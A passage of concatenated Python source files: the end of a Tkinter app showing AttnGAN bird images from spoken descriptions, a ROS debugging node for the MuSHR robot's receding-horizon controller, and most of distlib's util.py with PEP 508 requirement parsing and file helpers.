bird_imgg2 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/0_s_0_g2.png'))
bird_img1a0 = Image.open('../models/old/example_captions/1_s_0_a0.png')
bird_img1a0 = bird_img1a0.resize((580, 150))
bird_img1a0 = ImageTk.PhotoImage(bird_img1a0)
bird_img1a1 = Image.open('../models/old/example_captions/1_s_0_a1.png')
bird_img1a1 = bird_img1a1.resize((580, 150))
bird_img1a1 = ImageTk.PhotoImage(bird_img1a1)
bird_img1g0 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/1_s_0_g0.png'))
bird_img1g1 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/1_s_0_g1.png'))
bird_img1g2 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/1_s_0_g2.png'))
canvas1 = Canvas(old, width=600, height=850, scrollregion=(0,0,600,900)) #width=1256, height = 1674)
canvas1.grid(row=1, column=0, sticky="nsew") #added sticky
canvas1.create_image(10 , 10, anchor=NW, image=bird_imga0)
canvas1.create_image(10, 180, anchor=NW, image=bird_imga1)
canvas1.create_image(268, 350, anchor=NW, image=bird_imgg0)
canvas1.create_image(236, 430, anchor=NW, image=bird_imgg1)
canvas1.create_image(172, 580, anchor=NW, image=bird_imgg2)
canvas2 = Canvas(old, width=600, height=850, scrollregion=(0,0,600,900)) #width=1256, height = 1674)
canvas2.grid(row=1, column=1, sticky="nsew") #added sticky
canvas2.create_image(10 , 10, anchor=NW, image=bird_img1a0)
canvas2.create_image(10, 180, anchor=NW, image=bird_img1a1)
canvas2.create_image(268, 350, anchor=NW, image=bird_img1g0)
canvas2.create_image(236, 430, anchor=NW, image=bird_img1g1)
canvas2.create_image(172, 580, anchor=NW, image=bird_img1g2)
img00 = Label(old, image = bird_imga0)
img00.image = bird_imga0
img01 = Label(old, image = bird_imga1)
img01.image = bird_imga1
img02 = Label(old, image = bird_imgg0)
img02.image = bird_imgg0
img03 = Label(old, image = bird_imgg1)
img03.image = bird_imgg1
img04 = Label(old, image = bird_imgg2)
img04.image = bird_imgg2
img10 = Label(old, image = bird_img1a0)
img10.image = bird_img1a0
img11 = Label(old, image = bird_img1a1)
img11.image = bird_img1a1
img12 = Label(old, image = bird_img1g0)
img12.image = bird_img1g0
img13 = Label(old, image = bird_img1g1)
img13.image = bird_img1g1
img14 = Label(old, image = bird_img1g2)
img14.image = bird_img1g2
return old
def _createPictures_new(self, notebook):
new = ttk.Frame(notebook)
#new.title('Image in 512 pixels')
titleText = "Our Model"
self.Title = Label(new, text = titleText)
self.Title.grid(row = 0, column = 0, columnspan = 4)
self.Title.config(font = ('Helvetica', 44))
bird_imga0 = Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_a0.png')
bird_imga0 = bird_imga0.resize((580, 150))
bird_imga0 = ImageTk.PhotoImage(bird_imga0)
bird_imga1 = Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_a1.png')
bird_imga1 = bird_imga1.resize((580, 150))
bird_imga1 = ImageTk.PhotoImage(bird_imga1)
bird_imga2 = Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_a2.png')
bird_imga2 = bird_imga2.resize((580, 150))
bird_imga2 = ImageTk.PhotoImage(bird_imga2)
bird_imgg0 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g0.png'))
bird_imgg1 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g1.png'))
bird_imgg2 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g2.png'))
bird_imgg3 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g3.png'))
bird_img1a0 = Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_a0.png')
bird_img1a0 = bird_img1a0.resize((580, 150))
bird_img1a0 = ImageTk.PhotoImage(bird_img1a0)
bird_img1a1 = Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_a1.png')
bird_img1a1 = bird_img1a1.resize((580, 150))
bird_img1a1 = ImageTk.PhotoImage(bird_img1a1)
bird_img1a2 = Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_a2.png')
bird_img1a2 = bird_img1a2.resize((580, 150))
bird_img1a2 = ImageTk.PhotoImage(bird_img1a2)
bird_img1g0 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g0.png'))
bird_img1g1 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g1.png'))
bird_img1g2 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g2.png'))
bird_img1g3 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g3.png'))
canvas1 = Canvas(new, width=600, height=900, scrollregion=(0,0,600,1600)) #width=1256, height = 1674)
canvas1.grid(row=1, column=0, sticky="nsew") #added sticky
canvas1.create_image(10 , 10, anchor=NW, image=bird_imga0)
canvas1.create_image(10, 180, anchor=NW, image=bird_imga1)
canvas1.create_image(10, 350, anchor=NW, image=bird_imga2)
canvas1.create_image(268, 520, anchor=NW, image=bird_imgg0)
canvas1.create_image(236, 600, anchor=NW, image=bird_imgg1)
canvas1.create_image(172, 750, anchor=NW, image=bird_imgg2)
canvas1.create_image(44, 1030, anchor=NW, image=bird_imgg3)
ybar1=Scrollbar(new, orient='vertical', command=canvas1.yview)
ybar1.grid(row=1, column=1, sticky="ns")
canvas1.configure(yscrollcommand = ybar1.set)
canvas2 = Canvas(new, width=600, height=900, scrollregion=(0,0,600,1600)) #width=1256, height = 1674)
canvas2.grid(row=1, column=2, sticky="nsew") #added sticky
canvas2.create_image(10 , 10, anchor=NW, image=bird_img1a0)
canvas2.create_image(10, 180, anchor=NW, image=bird_img1a1)
canvas2.create_image(10, 350, anchor=NW, image=bird_img1a2)
canvas2.create_image(268, 520, anchor=NW, image=bird_img1g0)
canvas2.create_image(236, 600, anchor=NW, image=bird_img1g1)
canvas2.create_image(172, 750, anchor=NW, image=bird_img1g2)
canvas2.create_image(44, 1030, anchor=NW, image=bird_img1g3)
ybar2=Scrollbar(new, orient='vertical', command=canvas2.yview)
ybar2.grid(row=1, column=3, sticky="ns")
canvas2.configure(yscrollcommand = ybar2.set)
img00 = Label(new, image = bird_imga0)
img00.image = bird_imga0
img01 = Label(new, image = bird_imga1)
img01.image = bird_imga1
img02 = Label(new, image = bird_imga2)
img02.image = bird_imga2
img03 = Label(new, image = bird_imgg0)
img03.image = bird_imgg0
img04 = Label(new, image = bird_imgg1)
img04.image = bird_imgg1
img05 = Label(new, image = bird_imgg2)
img05.image = bird_imgg2
img06 = Label(new, image = bird_imgg3)
img06.image = bird_imgg3
img10 = Label(new, image = bird_img1a0)
img10.image = bird_img1a0
img11 = Label(new, image = bird_img1a1)
img11.image = bird_img1a1
img12 = Label(new, image = bird_imga1)
img12.image = bird_img1a2
img13 = Label(new, image = bird_img1g0)
img13.image = bird_img1g0
img14 = Label(new, image = bird_img1g1)
img14.image = bird_img1g1
img15 = Label(new, image = bird_img1g2)
img15.image = bird_img1g2
img16 = Label(new, image = bird_img1g3)
img16.image = bird_img1g3
return new
def _resize_image(self, event):
new_width = event.width
new_height = event.height
self.image = self.img_copy.resize((new_width, new_height))
self.backgroundImage = ImageTk.PhotoImage(self.image)
self.imageBG.configure(image = self.backgroundImage)
def _startRecording(self):
self.birdrec = self.rc.open('bird.wav', 'wb')
self.birdrec.start_recording()
self.flag = True
timeThread = threading.Thread(target = self._timeRunning)
timeThread.start()
return
def _stopRecording(self):
self.birdrec.stop_recording()
self.flag = False
return
def _timeRunning(self, t = 0):
while self.flag:
mins, secs = divmod(t, 60)
mins = int(round(mins))
secs = int(round(secs))
timeformat = '{:02d}:{:02d}'.format(mins, secs)
self.timeCount['text'] = 'Time: ' + timeformat
time.sleep(1)
t += 1
return
def _showResult(self):
self.timeCount['text'] = 'Time: --:--'
with sr.AudioFile('bird.wav') as source:
bird = self.recognizer.record(source)
try:
bird = self.recognizer.recognize_google(bird)
#tkMessageBox.showinfo(message = 'We are drawing your bird:\n' + bird)
#self._runTextToImage(bird)
self.type_bird(text = bird)
except sr.UnknownValueError:
tkMessageBox.showerror(message = "Sorry! we did not get your bird. Please try again!")
except sr.RequestError as e:
tkMessageBox.showerror(message = 'Sorry! Something went wrong with recognizer, please try again!')
return
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.screen_width = self.master.winfo_screenwidth()
self.screen_height = self.master.winfo_screenheight()
self.master.title('Speak out and get your bird')
x_c = (self.screen_width/2)-300
y_c = (self.screen_height/2)-200
self.master.geometry("600x400+%d+%d" % (x_c, y_c))
self.pack(fill=BOTH, expand=YES)
self.rc = recording.Recorder()
self.recognizer = sr.Recognizer()
self.recognizer.energy_threshold = 6000
self.flag = True
self.create_widgets()
root = Tk()
app = Application(master=root)
app.mainloop()
root.destroy()
|
rhcdebug.py
|
#!/usr/bin/env python3
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
import threading
import matplotlib.cm as cm
import matplotlib.colors as mplcolors
import rospy
import torch
from geometry_msgs.msg import PoseArray, PoseStamped, PoseWithCovarianceStamped
from std_msgs.msg import ColorRGBA
from visualization_msgs.msg import Marker
import logger
import parameters
import rhcbase
import rhctensor
import utils
class RHCDebug(rhcbase.RHCBase):
def __init__(self, dtype, params, logger, name):
rospy.init_node(name, anonymous=True, log_level=rospy.DEBUG)
super(RHCDebug, self).__init__(dtype, params, logger)
self.do_profile = True
self.traj_chosen = None
self.traj_chosen_id = 1
self.inferred_pose = None
self.init_pose = None
self.goal = None
self.debug_rollouts = self.params.get_bool(
"debug/flag/rollouts_on_init_pose", default=False
)
self.debug_current_path = self.params.get_bool(
"debug/flag/current_path", default=False
)
self.current_path = Marker()
self.current_path.header.frame_id = "map"
self.current_path.type = self.current_path.LINE_STRIP
self.current_path.action = self.current_path.ADD
self.current_path.id = 1
self.current_path.pose.position.x = 0
self.current_path.pose.position.y = 0
self.current_path.pose.position.z = 0
self.current_path.pose.orientation.x = 0.0
self.current_path.pose.orientation.y = 0.0
self.current_path.pose.orientation.z = 0.0
self.current_path.pose.orientation.w = 1.0
self.current_path.color.a = 1.0
self.current_path.color.r = 1.0
self.current_path.scale.x = 0.03
self.rhctrl = self.load_controller()
rospy.Subscriber("/initialpose", PoseWithCovarianceStamped, self.cb_initialpose)
if self.debug_current_path:
rospy.Subscriber(
rospy.get_param("~inferred_pose_t"),
PoseStamped,
self.cb_inferred_pose,
queue_size=10,
)
self.current_path_pub = rospy.Publisher(
"~current_path", Marker, queue_size=10
)
rospy.Subscriber(
"/move_base_simple/goal", PoseStamped, self.cb_goal, queue_size=1
)
self.goal_pub = rospy.Publisher("~goal", Marker, queue_size=10)
# self.value_heat_map_pub = rospy.Publisher("~value_fn", Marker, queue_size=100)
# self.pub_heat_map()
def cb_goal(self, msg):
goal = self.dtype(utils.rospose_to_posetup(msg.pose))
self.logger.info("Got goal")
if self.rhctrl is not None:
if not self.rhctrl.set_goal(goal):
self.logger.err("That goal is unreachable, please choose another")
else:
self.logger.info("Goal set")
self.goal = goal
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = 1
m.type = m.ARROW
m.action = m.ADD
m.pose = msg.pose
m.color.r = 1.0
m.color.b = 1.0
m.scale.x = 1
m.scale.y = 0.1
m.scale.z = 0.1
self.goal_pub.publish(m)
def cb_initialpose(self, msg):
self.init_pose = self.dtype(utils.rospose_to_posetup(msg.pose.pose))
self.logger.info("Got initial pose")
if self.debug_current_path:
# If the current path already exists, delete it.
self.current_path.action = self.current_path.DELETE
self.current_path_pub.publish(self.current_path)
self.current_path.action = self.current_path.ADD
if self.debug_rollouts:
if self.goal is not None:
# There is viz_logic in here, so don't do anything with the return
self.rhctrl.step(self.init_pose)
else:
self.logger.info("No goal set")
def cb_inferred_pose(self, msg):
if self.init_pose is not None:
self.current_path.header.stamp = rospy.Time.now()
self.current_path.points.append(msg.pose.position)
self.current_path_pub.publish(self.current_path)
self.inferred_pose = self.dtype(utils.rospose_to_posetup(msg.pose))
def cb_traj_chosen(self, msg):
self.traj_chosen = msg.poses
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = 1
m.type = m.LINE_STRIP
m.action = m.ADD
m.pose.position.x = 0
m.pose.position.y = 0
m.pose.position.z = 0
m.pose.orientation.x = 0.0
m.pose.orientation.y = 0.0
m.pose.orientation.z = 0.0
m.pose.orientation.w = 1.0
m.color.a = 1.0
m.color.g = 1.0
m.scale.x = 0.03
m.points = map(lambda x: x.position, self.traj_chosen)
self.traj_chosen_pub.publish(m)
self.traj_chosen_id += 1
def pub_heat_map(self):
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = 1
m.type = m.POINTS
m.action = m.ADD
m.pose.position.x = self.map_data.origin_x
m.pose.position.y = self.map_data.origin_y
m.pose.position.z = 0
m.pose.orientation = utils.angle_to_rosquaternion(self.map_data.angle)
m.color.a = 1.0
m.color.g = 1.0
m.scale.x = 0.5
rospoints = []
for i in range(150, self.map_data.width - 150, 50):
for j in range(150, self.map_data.height - 150, 50):
rospoints.append(self.dtype([i, j]).mul_(self.map_data.resolution))
print(self.map_data.resolution)
rospoints = torch.stack(rospoints)
print(rospoints)
print(self.map_data.height, self.map_data.width)
K = self.params.get_int("K")
T = self.params.get_int("T")
# Filter colliding points
collisions = self.dtype(K * T, 3)
for i in range(0, len(rospoints), K * T):
end = min(len(rospoints) - i, K * T)
collisions[:end, :2] = rospoints[i : i + end]
col = self.rhctrl.cost.world_rep.collisions(collisions)
for p, c in zip(collisions[:end], col[:end]):
if c == 0:
m.points.append(p)
points = self.dtype(K, 3)
colors = []
for i in range(0, len(m.points), K):
end = min(len(m.points) - i, K)
points[:end, 0] = self.dtype(map(lambda p: p.x, m.points[i : i + end]))
points[:end, 1] = self.dtype(map(lambda p: p.y, m.points[i : i + end]))
c2g = self.rhctrl.cost.value_fn.get_value(points)
colors.extend(map(float, list(c2g)[:end]))
print(colors)
norm = mplcolors.Normalize(vmin=min(colors), vmax=max(colors))
cmap = cm.get_cmap("coolwarm")
def colorfn(cost):
col = cmap(norm(cost))
r, g, b, a = col[0], col[1], col[2], 1.0
if len(col) > 3:
a = col[3]
return ColorRGBA(r=r, g=g, b=b, a=a)
m.colors = map(colorfn, colors)
self.value_heat_map_pub.publish(m)
def viz_traj_chosen_trace(self):
traj_chosen_topic = self.params.get_str("traj_chosen_topic")
rospy.Subscriber(
traj_chosen_topic, PoseArray, self.cb_traj_chosen, queue_size=10
)
self.traj_chosen_pub = rospy.Publisher("~traj_chosen", Marker, queue_size=10)
rate = rospy.Rate(self.params.get_int("debug/traj_chosen_trace/rate"))
while not rospy.is_shutdown():
if self.traj_chosen is not None:
m = Marker()
m.header.frame_id = "map"
m.header.stamp = rospy.Time.now()
m.id = self.traj_chosen_id
m.type = m.LINE_STRIP
m.action = m.ADD
m.pose.position.x = 0
m.pose.position.y = 0
m.pose.position.z = 0
m.pose.orientation.x = 0.0
m.pose.orientation.y = 0.0
m.pose.orientation.z = 0.0
m.pose.orientation.w = 1.0
m.color.a = 1.0
m.color.g = 1.0
m.scale.x = 0.03
m.points = map(lambda x: x.position, self.traj_chosen)
self.traj_chosen_pub.publish(m)
self.traj_chosen_id += 1
rate.sleep()
def viz_cost_fn(self):
rate = rospy.Rate(100)
while not rospy.is_shutdown():
if self.goal is not None and self.inferred_pose is not None:
# There is viz_logic in here, so don't do anything with the return
self.rhctrl.step(self.inferred_pose)
rate.sleep()
def start(self):
# If we are trying to debug our rollouts, we only want to run
# the loop on initial pose. This way of implementing it could be
# changed, but for now this will get the job done
if self.params.get_bool("~debug/flag/viz_traj_chosen_trace", True):
traj_chosen_trace_t = threading.Thread(target=self.viz_traj_chosen_trace)
traj_chosen_trace_t.start()
if self.params.get_bool("~debug/flag/viz_cost_fn", False):
cost_fn_t = threading.Thread(target=self.viz_cost_fn)
cost_fn_t.start()
rospy.spin()
if __name__ == "__main__":
params = parameters.RosParams()
logger = logger.RosLog()
node = RHCDebug(rhctensor.float_tensor(), params, logger, "rhcdebugger")
node.start()
|
util.py
|
#
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (
string_types,
text_type,
shutil,
raw_input,
StringIO,
cache_from_source,
urlopen,
urljoin,
httplib,
xmlrpclib,
splittype,
HTTPHandler,
BaseConfigurator,
valid_ident,
Container,
configparser,
URLError,
ZipFile,
fsdecode,
unquote,
urlparse,
)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
IDENTIFIER = re.compile(r"^([\w\.-]+)\s*")
VERSION_IDENTIFIER = re.compile(r"^([\w\.*+-]+)\s*")
COMPARE_OP = re.compile(r"^(<=?|>=?|={2,3}|[~!]=)\s*")
MARKER_OP = re.compile(r"^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*")
OR = re.compile(r"^or\b\s*")
AND = re.compile(r"^and\b\s*")
NON_SPACE = re.compile(r"(\S+)\s*")
STRING_CHUNK = re.compile(r"([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)")
def parse_marker(marker_string):
"""
Parse a marker string and return a dictionary containing a marker expression.
The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
the expression grammar, or strings. A string contained in quotes is to be
interpreted as a literal string, and a string not contained in quotes is a
variable (such as os_name).
"""
def marker_var(remaining):
# either identifier, or literal string
m = IDENTIFIER.match(remaining)
if m:
result = m.groups()[0]
remaining = remaining[m.end() :]
elif not remaining:
raise SyntaxError("unexpected end of input")
else:
q = remaining[0]
if q not in "'\"":
raise SyntaxError("invalid expression: %s" % remaining)
oq = "'\"".replace(q, "")
remaining = remaining[1:]
parts = [q]
while remaining:
# either a string chunk, or oq, or q to terminate
if remaining[0] == q:
break
elif remaining[0] == oq:
parts.append(oq)
remaining = remaining[1:]
else:
m = STRING_CHUNK.match(remaining)
if not m:
raise SyntaxError("error in string literal: %s" % remaining)
parts.append(m.groups()[0])
remaining = remaining[m.end() :]
else:
s = "".join(parts)
raise SyntaxError("unterminated string: %s" % s)
parts.append(q)
result = "".join(parts)
remaining = remaining[1:].lstrip() # skip past closing quote
return result, remaining
def marker_expr(remaining):
if remaining and remaining[0] == "(":
result, remaining = marker(remaining[1:].lstrip())
if remaining[0] != ")":
raise SyntaxError("unterminated parenthesis: %s" % remaining)
remaining = remaining[1:].lstrip()
else:
lhs, remaining = marker_var(remaining)
while remaining:
m = MARKER_OP.match(remaining)
if not m:
break
op = m.groups()[0]
remaining = remaining[m.end() :]
rhs, remaining = marker_var(remaining)
lhs = {"op": op, "lhs": lhs, "rhs": rhs}
result = lhs
return result, remaining
def marker_and(remaining):
lhs, remaining = marker_expr(remaining)
while remaining:
m = AND.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_expr(remaining)
lhs = {"op": "and", "lhs": lhs, "rhs": rhs}
return lhs, remaining
def marker(remaining):
lhs, remaining = marker_and(remaining)
while remaining:
m = OR.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_and(remaining)
lhs = {"op": "or", "lhs": lhs, "rhs": rhs}
return lhs, remaining
return marker(marker_string)
def parse_requirement(req):
"""
Parse a requirement passed in as a string. Return a Container
whose attributes contain the various parts of the requirement.
"""
remaining = req.strip()
if not remaining or remaining.startswith("#"):
return None
m = IDENTIFIER.match(remaining)
if not m:
raise SyntaxError("name expected: %s" % remaining)
distname = m.groups()[0]
remaining = remaining[m.end() :]
extras = mark_expr = versions = uri = None
if remaining and remaining[0] == "[":
i = remaining.find("]", 1)
if i < 0:
raise SyntaxError("unterminated extra: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
extras = []
while s:
m = IDENTIFIER.match(s)
if not m:
raise SyntaxError("malformed extra: %s" % s)
extras.append(m.groups()[0])
s = s[m.end() :]
if not s:
break
if s[0] != ",":
raise SyntaxError("comma expected in extras: %s" % s)
s = s[1:].lstrip()
if not extras:
extras = None
if remaining:
if remaining[0] == "@":
# it's a URI
remaining = remaining[1:].lstrip()
m = NON_SPACE.match(remaining)
if not m:
raise SyntaxError("invalid URI: %s" % remaining)
uri = m.groups()[0]
t = urlparse(uri)
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not (t.scheme and t.netloc):
raise SyntaxError("Invalid URL: %s" % uri)
remaining = remaining[m.end() :].lstrip()
else:
def get_versions(ver_remaining):
"""
Return a list of operator, version tuples if any are
specified, else None.
"""
m = COMPARE_OP.match(ver_remaining)
versions = None
if m:
versions = []
while True:
op = m.groups()[0]
ver_remaining = ver_remaining[m.end() :]
m = VERSION_IDENTIFIER.match(ver_remaining)
if not m:
raise SyntaxError("invalid version: %s" % ver_remaining)
v = m.groups()[0]
versions.append((op, v))
ver_remaining = ver_remaining[m.end() :]
if not ver_remaining or ver_remaining[0] != ",":
break
ver_remaining = ver_remaining[1:].lstrip()
m = COMPARE_OP.match(ver_remaining)
if not m:
raise SyntaxError("invalid constraint: %s" % ver_remaining)
if not versions:
versions = None
return versions, ver_remaining
if remaining[0] != "(":
versions, remaining = get_versions(remaining)
else:
i = remaining.find(")", 1)
if i < 0:
raise SyntaxError("unterminated parenthesis: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
# As a special diversion from PEP 508, allow a version number
# a.b.c in parentheses as a synonym for ~= a.b.c (because this
# is allowed in earlier PEPs)
if COMPARE_OP.match(s):
versions, _ = get_versions(s)
else:
m = VERSION_IDENTIFIER.match(s)
if not m:
raise SyntaxError("invalid constraint: %s" % s)
v = m.groups()[0]
s = s[m.end() :].lstrip()
if s:
raise SyntaxError("invalid constraint: %s" % s)
versions = [("~=", v)]
if remaining:
if remaining[0] != ";":
raise SyntaxError("invalid requirement: %s" % remaining)
remaining = remaining[1:].lstrip()
mark_expr, remaining = parse_marker(remaining)
if remaining and remaining[0] != "#":
raise SyntaxError("unexpected trailing data: %s" % remaining)
if not versions:
rs = distname
else:
rs = "%s %s" % (distname, ", ".join(["%s %s" % con for con in versions]))
return Container(
name=distname,
extras=extras,
constraints=versions,
marker=mark_expr,
url=uri,
requirement=rs,
)
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(root, path):
# normalizes and returns a lstripped-/-separated path
root = root.replace(os.path.sep, "/")
path = path.replace(os.path.sep, "/")
assert path.startswith(root)
return path[len(root) :].lstrip("/")
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, "/").rstrip("/")
destinations[resource_file] = rel_dest + "/" + rel_path
return destinations
def in_venv():
if hasattr(sys, "real_prefix"):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, "base_prefix", sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = "%c: %s\n%s" % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata["extensions"]["python.exports"]["exports"]
for group, entries in result.items():
for k, v in entries.items():
s = "%s = %s" % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, "read_file"):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = "%s = %s" % (name, value)
entry = get_export_entry(s)
assert entry is not None
# entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter("utf-8")(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = "%s:%s" % (entry.prefix, entry.suffix)
if entry.flags:
s = "%s [%s]" % (s, ", ".join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
# for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
# obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == "/":
return pathname
if not pathname:
return pathname
if pathname[0] == "/":
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == "/":
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split("/")
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" % os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying %s to %s", infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = "%s is a symlink" % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = "%s is a non-regular file" % outfile
if msg:
raise ValueError(msg + " which would be overwritten")
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying stream %s to %s", instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, "wb")
else:
outstream = codecs.open(outfile, "w", encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
if os.path.exists(path):
os.remove(path)
with open(path, "wb") as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.write_binary_file(path, data.encode(encoding))
def set_mode(self, bits, mask, files):
if os.name == "posix" or (os.name == "java" and os._name == "posix"):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info("Creating %s" % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(
